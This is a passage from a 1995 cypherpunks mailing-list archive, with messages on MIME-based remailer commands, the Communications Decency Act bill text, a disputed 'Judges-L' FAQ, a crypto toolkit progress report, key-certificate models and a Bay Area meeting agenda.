And it reaised anew questions about why the FBI was unable to prevent
the 1993 bombing, one of the most serious terrorist actions in the
United States.

	...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: xpat@vm1.spcs.umn.edu
Date: Wed, 8 Feb 95 14:52:06 PST
To: cypherpunks@toad.com
Subject: Re: MIME based remailing commands
Message-ID: <9502082251.AA03118@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal writes:

>I can see that putting remailer commands into a specific part of a MIME
>multipart message has some advantages.  Right now we are basically
>having the remailing commands be mail header fields.

>OTOH it does have the advantage that it is easy to do, at least with th
>"::" pasting token idea (which perhaps would need to be documented in is
>own right).

IMHO, an ideal message would have the ability to handle nested objects
of varying types, MIME is only a start. To construct a unique format
for remail_messages is reasonable, perhaps even preferable. But of
course, MIME *could* be a start, in a brown'n'serve roll sort of way.

However, with a proprietary approach,
what to use for delimiters, or quasi-parentheses (in the case of n
layers of nesting, encrypted or unencrypted) needs extensive and
careful consideration. This is the same dilemma many developers face
with document-centric interfaces and their plethora of odd-bird formats.

I say take the remail stuff out of the header altogether,
MIME or not.

----------------------------------------------------------------
P M Dierking |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 8 Feb 95 13:38:00 PST
To: "Craig A. Johnston" <caj@tower.techwood.org>
Subject: Re: Judges-L FAQ
In-Reply-To: <199502082043.MAA21652@tower.techwood.org>
Message-ID: <9502082137.AA10512@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"Craig A. Johnston" says:
> 
> It has come to my attention that the Judges-L FAQ is being distributed
> by someone who obtained it on this list, and being sent to people made
> to look as if it has issued from David Stodolsky.  
> 
> I must inform you that this FAQ is copyrighted material, and 
> you are requested not to distribute it. 

If the material is not actually registered with the copyright office,
I'll point out that at most you can get the distribution stopped, but
cannot get damages for the distribution. Unless you actually intend to
spend substantial sums on lawyers, you are unlikely to be able to do
even this much.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@tis.com>
Date: Wed, 8 Feb 95 13:53:46 PST
To: jpp@markv.com
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502082023.MAA00749@comsec.com>
Message-ID: <9502082149.AA28226@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Sender: owner-cp-lite@comsec.com
>X-Signed: PGP-Detached-2-3,
>   iQBXAwUBLzhSutC3U5sdKpFdAQEEqwIMCg1PFWC19WuW2BhwmzUyg84RthT/61x9
>   vLrIPbgrYcCXCNB8F51tQogs5lBrry/aOk2Fk3Izl//XC4KDl+cADrCz
>Date: Tue, 7 Feb 95 21:24:01 PST
>From: jpp@markv.com

>of the very most important rights.  To hold the owner of a buliten
>board responsible for the illegal messages posted to it, is to force
>the buliten board owner to become a government censor in all but name
>(and wages).

anyone heard of "no unfunded mandates" ?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 8 Feb 95 14:04:36 PST
To: rah@shipwright.com
Subject: Re: Effects of S.314 (Communications Decency Act)
Message-ID: <v01510103ab5eaa4305cf@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:02 PM 2/8/95, Robert Rothenburg Walking-Owl wrote:
>Of course geographic community standards are problematic too with
>telecommunications since postal inspectors from Tennessee can call
>up adult bulletin boards in California...

This reminds me of a joke I finally grew tired of, prescient though it may
have been given current legal events in Tennessee:

        It's illegal in Cambridge to smoke in Boston...

Most non-smokers, especially the reformed-smoker non-smokers, didn't think
that that one-liner was very funny. Most small-l libertarians had a hoot or
too about it though.  (Just like the punchline about how many radical
feminists it takes to screw in a lightbulb [A: That's really *not* funny.])


I guess I'll sit down now...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 8 Feb 95 17:16:59 PST
To: cypherpunks@toad.com
Subject: The drumbeat against anonymity continues....
Message-ID: <199502090115.RAA22929@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In addition to the articles and editorials, I'm seeing articles
slamming anonymity and pseudoanonymity (we need a better word!) in
business contexts.

See the latest RISKS Digest (16.79, available on Usenet in the group
comp.risks) for a couple of articles of interest. One is about the
Singapore plans for an automatic vehicle intentification (AVI) system
to implement "road pricing" on congested roads. Phil Agre's article
makes some good points, and mentions using digital cash to avoid the
Big Brother problems, but notes that Singapore is not seriously
considering it.

The real "drumbeat" article is about cellular phone fraud and
toll-free number fraud. Actaully, a couple of related articles.
(Everyone should at least skim "RISKS.")

Anonymity is cited as a problem. But this misses the point, that the
real problem is lack of a proper payment model. As David Chaum points
out, there are really only two basic payment approaches: transfer of
something of value or an account-based transfer. Cash or barter are
examples of the first, checks or credit card payments are examples of
the second (though each has some wrinkles). Digital cash, when online
cleared, behaves mostly like real cash.

The phone companies that are complaining about fraud have inadequately
arranged for security and need to adopt a mode that fixes this. Since
physical money can't be fed into the slots of a handheld cell phone (or
at least can't then be delivered to the service owner!), the solution
has traditionally been an account-based payment system. (Accounts can
also be better protected against fraud by having PINs, etc.)

What about telephone calling cards? I don't recall the details well
enough to know if they could be used on handheld units. Maybe they
could be used.

This could eventually be a market for digital cash. (If fraud is a
serious-enough problem, costing enough, then a service which could
lower costs by using digital cash could make market inroads.)

What we need to watch out for are proposals to limit anonymity, to
mandate national ID cards, so as to somehow limit such cases of fraud.

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Wed, 8 Feb 95 17:42:41 PST
To: Michael Sattler <msattler@jungle.com>
Subject: Re: Judges-L FAQ
In-Reply-To: <v03001409ab5ef19cb7c7@[140.174.229.204]>
Message-ID: <Pine.3.89.9502081717.A17747-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain



At 12:43 2/8/95, Craig A. Johnston wrote:
> >I must inform you that this FAQ is copyrighted material, and
> >you are requested not to distribute it.
 
On Wed, 8 Feb 1995, Michael Sattler wrote:
> What good is a FAQ if you can't distribute it.  The judges are confused in
> more ways than one.

I am entirely sympathetic to the judges, but obviously we need
to keep an eye on them.

Their attempt to restrict circulation of their FAQ fails to
inspire confidence.  It is supiciously reminiscent of 
what the Church of Scientology is up to.

But I repeat, I think that the judges list is necessary
and desirable, so long as they remember they are self
appointed and do not start to imagine that they are
the "official" judges.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 8 Feb 95 15:04:29 PST
To: xpat@vm1.spcs.umn.edu
Subject: Re: MIME based remailing commands
In-Reply-To: <9502082251.AA03118@toad.com>
Message-ID: <9502082303.AA10796@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



xpat@vm1.spcs.umn.edu says:
> IMHO, an ideal message would have the ability to handle nested objects
> of varying types, MIME is only a start.

What is it precisely that you might want to encapsulate that MIME
can't encapsulate?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hugh@ecotone.toad.com (Hugh Daniel)
Date: Wed, 8 Feb 95 18:19:01 PST
To: cypherpunks@toad.com
Subject: Meeting Anncouncement for Sat. Feb. 11 1995 SF Bay Area Meeting
Message-ID: <9502090217.AA09964@ecotone.toad.com>
MIME-Version: 1.0
Content-Type: text/plain



What:	Cypherpunks SF Bay Area Physical Meeting
When:	13:00 February 11 1995
Where:	Silicon Graphics, Inc.,  Building 5 (SGI's Iris Cafeteria)
	2025 North Shoreline Boulevard, Mountain View, CA, Earth, Sol, MW

Topic:	Crypto Networking Protocol Hygiene

Agenda:  (listed times are almost all a joke)
  12:00	Brown Bag Lunches, AV Debugging, Loose Talk
  13:00	Meeting Begins (MBONE broadcast begins)
  13:02	Meeting Announcements, Agenda Rewrite
  13:08	Hugh Daniel on
  	"When What Goes Where: Good Networking Protocol Hygiene"
  13:45	Eric Hughes on
	"Sendmail as a Multiplexor"
  14:30 Michael Sattler on
	"Announcement of CryptDisk v1.0"
  14:40	General Announcements, Questions, Confusion etc.
  15:00	BREAK!
  15:30	Doug Barnes
        "Stream-oriented, analysis-resistant public-key protocols over UDP"
  16:15 Raph Levien & KT Kislitzin on
	"Design philosophy for the upcomming PGP 3.0 API"
  17:00	Hot New Topics of the Week & General Free For All!
  17:59 Mbone Broadcast ends
  18:00	KP room, Thank our SGI hosts & GOTO Dinner

Presentations:

"When What Goes Where: Good Networking Protocol Hygiene"
	Hugh Daniel <hugh@toad.com>
  When designing, coding and testing programs we are confronted with a
myriad of choices as to how various parts of the solution communicate.
Much is known about how to design 'protocols' that are flexible,
debugable & robust.
  We are currently encoding cryptographic protocols in our systems and
networks at a furious rate, yet there are new challenges in keeping such
systems robust, secure and sometimes even anonymous.
  I hope to touch on some of the well known tricks and dangers, what
is new when cryptographic and anonymous systems are combined with
todays systems and where we might learn from the past.
  

"Sendmail as a Multiplexor."
           Eric Hughes <eric@remailer.net>
  The basic architecture of sendmail is a recognizer and a dispatcher.
These two elements provide a good framework for designing systems that
can be changed piece by piece.  Even when a facility seems to have
stabilized, it's often a good idea to keep the flexible framework
around for future experimentation and expansion.


"Announcement of CryptDisk v1.0"
	Michael Sattler <msattler@jungle.com>
  CryptDisk (for the Macintosh) is an example of the kinds of [mostly]
transparent strong crypto that we need.  Integrated smoothly with the
operating system, CryptDisk provides IDEA encryption on a block
read/write level for a virtual hard disk.  It's beauty lies mainly in
that it does exactly what the user expects and requires no more setup
than remembering a pass-phrase.  Source code is available upon
request.  Warning:  Some governments might consider this software a
"Munition", not suitable for "private possession" by free peoples.


"Stream-oriented, analysis-resistant public-key protocols over UDP"
	Doug Barnes <dab@Tadpole.COM>
  Many cypherpunks projects have a need to reliably transmit
variable-length (sometimes quite long) data over unreliable
networks. TCP lends itself to traffic analysis and is not well-suited
for use in a hypothetical system of packet laundries that would lead
to packets within a particular stream appearing to come from a variety
of sources.  We have designed and are currently implementing a
UDP-based, hidden-streams protocol that utilizes fixed-length blocks
and pseudo-random sequence numbering to provide reliable,
stream-oriented services to higher-level applications despite
extremely creative routing and laundering of packets.

Raph Levien <raph@netcom.com> & KT Kislitzin <ktk@sgi.com>
	"Design philosophy for the upcomming PGP 3.0 API"
  PGP is getting a major upgrade soon, some of the team doing the
work will talk about the motivations and directions the work is
going in.

--------------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Wed, 8 Feb 95 15:35:55 PST
To: weidai@eskimo.com
Subject: Re: a new way to do anonymity
In-Reply-To: <199502082243.AA19005@mail.eskimo.com>
Message-ID: <9502082318.AA21943@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain



...
>since you can use it to do nested encryption.  All that's needed is 
>to hack it so that it implements link encryption (i.e., send a
>constant stream of random data in between keypresses).
...
You could just send a stream of some uncomon ascii character, which you
filter out on the receiving end (if you wanted to this right, you could add
a simple escape mechanism for actually passing that character).

To avoid flooding the network and also bringing the machines on which its
running to its knees, you'd probably want to add a bandwidth-choke
mechanism to run the white noise at some reasonable rate.  You'd have to limit
the real traffic output to the same rate.  Link encryption over a broadcast
network is a tricky business.
>
>I wonder if Matt has the time and interest do this...  If not then I 
>guess I can try, but I've never done real crypto programming before...
>

For the next couple of months, I have absolutely no free hacking time.
Things on the stack include:
	- ESM 1.0
	- Diffie-Hellman encrypting and authenticating Telnet (almost ready...)
	- CFS 1.3
	- The course
	- The book
	- My real work

So I don't even have the time to figure out whether I have the interest.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A Loose Affiliation of Millionaires and Billionaires and Babies <cactus@hks.net>
Date: Wed, 8 Feb 95 16:14:33 PST
To: cypherpunks@toad.com
Subject: Hastur CT status
Message-ID: <199502082009.TAA22774@seabsd.hks.net>
MIME-Version: 1.0
Content-Type: text/plain



(Sorry if the signature gets anybody's noses out joint.  I'm in a goofy
 mood.)

-----ORTVA CTC FVTARQ ZRFFNTR-----

It's another Hastur Crypto Toolkit progress report.  Why?  Because many
people expressed an interest in it, because I want to continue to get
comments on what I'm doing, because I want people who might be inclined
to do something similar to know about what I'm doing, and because
cypherpunk projects tend to be assumed to be dead if nothing is heard.

The general IO section skeleton is finished, and all file I/O and memory
I/O types are supported.  Encoding rules now fully coded in are rot13 (for
simple testing), uuencode, and radix64.  There are also unfilled stubs
for DER/BER at the moment.  

I'm about to start in on the framework for crypto code and key management:
Any ideas on handling a generalized concept of keys will be greatly
appreciated!  For instance, I've asserted several times here that
X.509 keys can be fully modelled as special cases of PGP web-of-trust
keys with one additional field, the expiration time.  Nobody has flamed me, but
nobody has agreed with me... since I've only read the X.509 spec and never
actually used them, I'd like some assurance that I'm not missing some
subtleties in this approach.

The general I/O is fairly slow, since items are fetched in blocks
appropriate for the encoding (IE, radix 64 maps 4 bytes r64 to 3 bytes
binary);  I might put the effort into optimizing it later, but my gut
feeling is that the crypto is going to be at least an order of magnitude
slower.

Now, the general outline of what I'm building.  This is pretty much the
same as what I've posted before.  I do want to note that all I/O is
locking, using a library of locking versions of I/O fns I sent to some
folks here a while ago.

- ---
Hastur Crypto Toolkit.

In essence, what I'm building is a crypto library that takes a very general
approach with a few parameters controlling its behavior.  The idea is
to have something that anybody can drop into their mail agent and have
an easy way of using crypto and interface with existing systems such as
PGP.  A major design goal is to be backwards compatable with PGP, but
paramount is having a plug-and-play library that will be flexible enough
to meet future crypto needs.  RIPEM compatability is also desirable.

One of the biggest problems today is that crypto libraries are chiselled out
to deal with very specific cases -- the most general I know of if is RSAREF,
which deals with only with crypto functions that RSADSI happens to find
useful.

The things that I've parametrized in the design are:

	- Type of I/O.  Right now, files (and fds) and a couple of memory
	 configurations	are supported.  I've made it trivial to add new
	 types of I/O as well, and there are flags to support to
	 immediate zeroing of data once it is read into the internal
	 structures.

	- Encoding of data.  There are multiple ways to encode a bytestream
	 and these methods can be nested.  In this library, you can specify
	 the type.  I also want to eventually put logic in (where possible)
	 to determine the type and will also use this to support various
	 compression schemes.  Currently supported are rot13, radix64, and
	 uuencode.

	- Ciphers (this is the big one).  Right now, as I've mentioned,
	 things are very haphazard.  What I want is a way to change one
	 parameter from, for example, CRTYPE_IDEA to CRTYPE_DES and
	 thus change the encryption scheme.

	- Key management.  I know of two major ways of doing things
	 right now, X.509/PEM certificates as pushed by RSADSI, and
	 PGP web-of-trust.  As far as I can tell, PEM-style certificates
	 are just a degenerate case of PGP web-of-trust.

	- Random sources.  People should be offered a pretty good source
	 of random numbers, but should also be allowed to drop in their
	 own sources.  This is going to be relatively tough on platforms
	 I don't know much about, IE Mac and PC, but I'm hoping for some
	 help on this.  I can also salvage some code from RIPEM for those.

	- Autoconfiguration to incoming messages.  People should be
	 able to open a file and have it work, even with schema added
	 to the library after the original adaption to Hastur (assuming
	 an upgrade of the library, of course).

There's some other stuff that I'm probably forgetting here, but that's
the gist of it.  The cipher code is going to be pretty simple: I'm
getting a lot of code from various places on the net;  the code exists,
it just isn't put into a form that is easy to use.  The most difficult is
going to be a generalized scheme for key management: first off, I'm probably
going to simply use PGP's web-of-trust as my model, assuming the X.509/PEM
style certificates can be treated as degenerate cases of web of trust.

I also intend to offer a GSSAPI interface to all of this in release
1.1 or so.

This is so far all in C: I'm not a C++ convert yet and C is still the
most portable of the languages about.  Later, perhaps class libraries
can be designed around the same code.

Comments are actively solicited.

-----ORTVA CTC FVTANGHER-----
Irefvba: 2.6.2

vDPINjHOYmxxvuAutbieCO7qNDSfStDNyU0k5/4/10EHEJGY72kwhzoGEAZMe0z7
oQf4Y+QbtweC9vauOYo8SAXFrI4td2coJ3xbtsojYTuhHamWcX2AxIlLedSWFuuJ
e6mIEDbk6xIpoyLvIsfSLUqKkO6qe4hWXZxORSF6vN6cqvmNaNAuG17nE8IqfiAh
ZeydKo0cNf8=
=oOZD
-----RAQ CTC FVTANGHER-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Wed, 8 Feb 95 17:28:24 PST
To: cypherpunks@toad.com
Subject: Not necessarily crypto but scary anyway...
Message-ID: <199502090123.TAA01134@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


Hi all,

A friend advises me that today House Bill 666 passed. This supposedly would
allow police officers to use evidence collected illegaly if they 'believed'
that it was collected in good faith.

Any word on it?

Thanks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Wed, 8 Feb 95 19:25:52 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: Judges-L FAQ
Message-ID: <v0300141bab5f39c0aa65@[140.174.229.204]>
MIME-Version: 1.0
Content-Type: text/plain


At 17:40 2/8/95, James A. Donald wrote:

>But I repeat, I think that the judges list is necessary
>and desirable, so long as they remember they are self
>appointed and do not start to imagine that they are
>the "official" judges.

By choosing that name they've shown (to my satisfaction) that they have the
subtlety and self-importance of a lynch mob.  The goofiness about a
copyrighted FAQ only adds to my feelings of them being a dangerous keystone
kops net-alike.

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
      You couldn't get a clue during the clue mating season in         |
 a field full of horny clues if you smeared your body with clue musk   |
           and did the clue mating dance. - Edward Flaherty            |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: silly@beat.ugcs.caltech.edu ((me))
Date: Wed, 8 Feb 95 19:38:08 PST
To: mlist-cypherpunks@nntp-server.caltech.edu
Subject: S314 and potential hell-raising
Message-ID: <3hb6vd$2q4@gap.cco.caltech.edu>
MIME-Version: 1.0
Content-Type: text/plain


It seems that 314 is a VERY BIG potental problem, and we should
probably be doing everything in our power to find out what it REALLY
means and fight it tooth and nail.  I think Usenet is the perfect
place to take this fight, but I'm not sure what groups are best 
suited to a discussion.  Any suggestions?

We simply MUST isolate this bill and, if it even comes close to sounding
like what I think it does (ending the near-absolute freedom of expression
and content across the Internet), we must fight it in every way possible,
enlisting the ACLU, the EFF, and any other group potentially willing
to pour money into a legal battle.

(me)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 8 Feb 95 19:51:32 PST
To: cypherpunks@toad.com
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <v01510100ab5f0c4d5b89@[166.84.250.21]>
Message-ID: <199502090349.TAA24428@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: dmandl@panix.com (David Mandl)

   For a while, we were all convinced that the FCC left all these rules
   impossibly vague on purpose, just so that you didn't even know how to obey
   the law if you wanted to.  Everyone a potential criminal.

Just like the banking world, where it's no secret at all.

Did y'all know there's a separate market segment in the banking
business called "Compliance"?

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 8 Feb 95 19:58:00 PST
To: cypherpunks@toad.com
Subject: Da Judge-L FAQ -- We are not Amused
Message-ID: <199502090356.TAA04852@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



It has come to Our attention that Our FAQ, the Da Judge-L FAQ, is being
distributed amongst the rabble.

We are not amused.

The so-called Cypherpunks List, having been a party to this illegal
and "most heinous" distribution, is hereby invited to appear in our
Chambers on the morning of Tuesday, 29 February, 1995, at a place of
our choosing. Defense will be heard, and then the guilty will be
punished.

Royally Yours, 

Da Judge-L







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 8 Feb 95 20:10:38 PST
To: cypherpunks@toad.com
Subject: Re: Hastur CT status
In-Reply-To: <199502082009.TAA22774@seabsd.hks.net>
Message-ID: <199502090408.UAA24470@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: A Loose Affiliation of Millionaires and Billionaires and Babies <cactus@hks.net>

   For instance, I've asserted several times here that X.509 keys
   can be fully modelled as special cases of PGP web-of-trust keys
   with one additional field, the expiration time.  Nobody has flamed
   me, but nobody has agreed with me... since I've only read the X.509
   spec and never actually used them, I'd like some assurance that I'm
   not missing some subtleties in this approach.
   
The only real question about a particular string of bits claiming to
be a public key of a certain persona is whether the operator trusts
that the key does belong to that persona.  PGP and X.509 models both
provide their own kinds of assurances to individuals who might use a
key.  The relation between the user and the claim of ownership is the
important relationship.  Any sort of key certificate, of whatever
sort, is merely an aid to gaining trust.

Key certificates don't prove ownership.  Key certificates transfer the
need for trust in the key to the need for trust in the certificate.
Put another way, a key distribution system allows a user to trust
something harder to fake than a single key.  The transfer is the
critical point here; instead of trusting one small thing, you can
trust one larger thing.  We hope that the larger system is worthy of
our trust.

Neither PGP nor PEM is a general purpose key distribution system,
although PGP is more general than PEM.  Both have their various
arbitrary and capricious policies hardcoded into both spec and source.

I would recommend, Todd, that you not try to unify the various key
distribution systems.  It's premature.  Rather, provide a local policy
hook for the user (and this is _not_ just the sysadmin, as you know)
to specify how much trust pertains to each given keydist system, and
of what idiosyncratic sorts.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Don Clysdale <clysdale@dragon.achilles.net>
Date: Wed, 8 Feb 95 18:48:27 PST
To: jason cooper <jcooper@acs.ucalgary.ca>
Subject: Re: The Rise of "Worse is Better"...
In-Reply-To: <Pine.3.89.9502070839.B31143-0100000@acs6.acs.ucalgary.ca>
Message-ID: <Pine.SUN.3.91.950208201048.26954A-100000@dragon.achilles.net>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 7 Feb 1995, jason cooper wrote:

> I like.  I guess I'm basically in with the New Jersey crowd.  Anybody 
> else?

	Definitely...  You've seen some of my code, haven't you...??

Remember that LISP shit at 4:00 in the morning, Stig?  Gack was
that New Jersey code!!!

								-Ian!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 8 Feb 95 20:14:43 PST
To: cypherpunks@toad.com
Subject: Re: skronk
In-Reply-To: <9502081137.ZM28317@warp.mcom.com>
Message-ID: <199502090413.UAA24481@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "Kipp E.B. Hickman" <kipp@warp.mcom.com>

   You are right here. However, our observation is that an interesting
   chunk of the world is moving towards using X.509 based certificate
   infrastructures for many things.

It's that interesting chunk that RSADSI is pointing out to you.  When
you see the world through the eyes of a vendor ...

And you know, of course, that PEM really stands for Patent Extension
Mechanism.

I don't really blame you much.  I mean TIPEM handles all the X.509
stuff just fine and PGP can't get out even the simplest of libraries,
or even a partial library.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 8 Feb 95 20:20:48 PST
To: cypherpunks@toad.com
Subject: Re: MIME based remailing commands
In-Reply-To: <199502082037.MAA02640@jobe.shell.portal.com>
Message-ID: <199502090419.UAA24497@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Hal <hfinney@shell.portal.com>

   Is there precedent for
   adding service-by-mail functionality in this way?  

You mean, like MIME?

   (Maybe "Latency"
   might be used in a future extension of RFC822 for some other meaning than
   what we are using it for.)

The command should be Add-Delay: if you want to acheive the result of
some latency.  (Those who don't recognize the double-edged nature of
this remark are welcome to make fools of themselves in public.)

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 8 Feb 95 20:23:40 PST
To: cypherpunks@toad.com
Subject: Re: skronk
In-Reply-To: <9502081309.ZM28575@warp.mcom.com>
Message-ID: <199502090422.UAA24509@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "Kipp E.B. Hickman" <kipp@warp.mcom.com>

   Yes, there will be. We haven't formalized it yet, but we have been
   getting enough interest to warrant it. Understand that this is not
   the main thrust of our business (selling source code), so it will
   certainly take some time to put it all together.

Pardon me if I point out that when you write a new facility and want
people to be compatible with it, there needs to be source code
available for distribution.  Perhaps this is merely a lapse in
corporate self-awareness and fundamental lack of planning.  I could be
wrong.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 8 Feb 95 20:27:14 PST
To: cypherpunks@toad.com
Subject: Re: MIME based remailing commands
In-Reply-To: <9502082303.AA10796@snark.imsi.com>
Message-ID: <199502090425.UAA24521@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "Perry E. Metzger" <perry@imsi.com>

   xpat@vm1.spcs.umn.edu says:
   > IMHO, an ideal message would have the ability to handle nested objects
   > of varying types, MIME is only a start.

   What is it precisely that you might want to encapsulate that MIME
   can't encapsulate?

Perry, you're missing the whole point, just like the exchange a few
days about a remailer format standard.

MIME is primarily a packaging standard.  MIME does not define the
innards, the payload, the contents.  MIME is only a start at what the
complete data format should look like.  You say MIME, and you've not
completely specified the data format, but rather constrained it in a
way that most everybody basically agrees with, including me.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Date: Wed, 8 Feb 95 20:38:25 PST
To: cypherpunks@toad.com
Subject: S. 314 and existing situation
Message-ID: <199502090439.UAA23399@mail.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain



Gee, fellas, looking over this bill, *most* of what's going on is
just porting existing telephone law over to cybercomm. Given the
existence of 900-sex-talk, the phone companies are clearly not being
held responsible for content.

They are required, of course, to cooperate when complaints of 
harassing or obscene calls are made, to obey properly warranted 
requests for wiretaps, etc.  It's perfectly reasonable to expect 
similar requirements on net service providers.

> 
> Read carefully. There are indeed implications for Internet service 
> providers in terms of their responsibility under the law for the content 
> of their systems and services.
> 

Yeah, but First Amendment and common carrier law is a morass of 
conflicting statutes, interpretations, and case law.  After all, 
libel law puts some content liability on newspapers [too much, IMHO, 
but it has hardly destroyed freedom of the press].

As several posters have noted, the placement of the key words 
"knowingly" and "intentionally" are critical.  It doesn't appear, 
though, that any "knowingly"s or "intentionally"s have been removed.  
I am forwarding copies of this and the whole bill text to my brother, 
the former DA in Telluride, to see if he sees any unusual craptraps.  
I'll post any useful reply ...

>    
>    (a) Prohibited acts generally
>    
>    Whoever -
>    
>    (1) in the District of Columbia or in interstate or foreign
>    communication by means of [telephone] telecommunications
>    device -
>    
>    (A) [makes any comment, request, suggestion or proposal] 
>    makes, transmits, or otherwise makes available any comment,
>    request, suggestions, proposal, image, or other communication]
>    which is obscene, lewd, lascivious, filthy, or indecent;
> 
>    (B) [makes a telephone call, whether or not conversation
>    ensues, without disclosing his identity and with intent to
>    annoy, abuse, threaten, or harass any person at the called
>    number] makes a telephone call or utilizes a telecommunications
>    device, whether or not conversation or communications ensues,
>    without disclosing his identity with intent to annoy, abuse,
>    threaten, or harass any person at the called number or who
>    receives the communication;
>    
>    (C) makes or causes the telephone of another repeatedly or   
>    continuously to ring, with intent to harass any person at the
>    called number; or
>    
>    (D) [makes repeated telephone calls, during which conversation
>    ensues, solely to harass any person at the called number; or]
>    makes repeated telephone calls or repeatedly initiates
>    communication with a telecommunications device, during which
>    comversation or communication ensues, solely to harass any
>    person at the called number of who receives the communication;
>    or

I.e., *just like with phones,* you can't send harrassing or obscene 
messages to unwilling recipients.  Is there a lot of slack for 
bullshit?  You betcha!  A major change from the present?  Doesn't 
look like it.  [no intention of holding up the present as paradise, of 
course  ;-]

>    
>    
>    (b) Prohibited acts for commercial purposes; defense to prosecution
>    
>    (1) Whoever knowingly -
                         ^^^^^^^^^^ [applies to A & B below]
>    
>    (A) within the United States, by means of [telephone], 
>    telecommunications device makes (directly or by recording device)
>    any obscene communication for commercial purposes to any person, 
>    regardless of whether the maker of such communication [placed the
>    call] placed the call or initiated the conversation; or
>    
>    (B) permits any [telephone] telecommunications facility under such 
>    person's control to be used for an activity prohibited by
>    subparagraph (A), shall be fined in accordance with title 18 or 
>    imprisoned not more than two years, or both.
>    
>    (2) Whoever knowingly -
                         ^^^^^^^^^^ [applies to A & B below]
>    
>    (A) within the United States, [by means of telephone, makes]
>    by means of telecommunications device, makes, knowingly
>    transmits, or knowingly makes available (directly or by recording 
>    device) any indecent communication for commercial purposes which is 
>    available to any person under 18 years of age or to any other person 
>    without that person's consent, regardless of whether the maker of
>    such communication [placed the call] placed the call or
>    initiated the communication; or
>    
>    (B) permits any [telephone] telecommunications facility under such 
>    person's control to be used for an activity prohibited by subparagraph 
>    (A), shall be fined not more than [$50,000] $100,000 or imprisoned not 
>    more than [six months] 2 years, or both.
>

===================================
Rich Dutcher, San Francisco Greens
